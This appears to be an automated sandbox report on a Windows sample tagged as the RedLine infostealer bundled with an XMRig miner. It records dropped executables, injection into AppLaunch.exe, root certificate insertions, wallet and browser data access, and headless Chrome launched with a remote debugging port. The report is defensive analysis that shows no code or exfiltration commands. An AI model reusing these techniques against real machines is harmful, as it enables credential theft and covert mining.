Malware Analysis Report

2025-01-18 09:17

Sample ID 230808-aawhhsbd4t
Target cc4d8fc3c02d1706c374f38b4f8074e0.exe
SHA256 829c8a42d65b1587d2067127d22ed243d75c50e3b0830344dd5d64ac6ce390de
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

829c8a42d65b1587d2067127d22ed243d75c50e3b0830344dd5d64ac6ce390de

Threat Level: Known bad

The file cc4d8fc3c02d1706c374f38b4f8074e0.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner

xmrig

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Themida packer

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 00:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 00:01

Reported

2023-08-08 00:03

Platform

win7-20230712-en

Max time kernel

44s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe"

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1892 set thread context of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe

"C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 108

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=52590 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6039758,0x7fef6039768,0x7fef6039778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=872 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=52590 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1448 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

